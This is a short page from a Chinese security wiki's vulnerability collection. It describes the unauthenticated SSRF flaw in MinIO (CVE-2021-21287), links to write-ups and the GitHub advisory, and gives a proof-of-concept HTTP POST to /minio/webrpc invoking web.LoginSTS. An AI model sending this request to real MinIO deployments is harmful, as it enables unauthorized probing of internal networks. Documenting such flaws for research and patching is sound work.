menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right MinIO未授权SSRF漏洞(CVE-2021-21287).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    MinIO未授权SSRF漏洞(CVE-2021-21287).md
    841 B / 2021-05-21 09:14:38
        # MinIO未授权SSRF漏洞(CVE-2021-21287)

详情可以看PHITHON的「容器与云的碰撞——一次对MinIO的测试」:https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html

复现可以参考:https://www.o2oxy.cn/3104.html

PoC:

```bash
POST /minio/webrpc HTTP/1.1
Host: 192.168.1.142:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 80

{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}
```

ref:

* https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
* https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
* https://www.o2oxy.cn/3104.html
    links
    file_download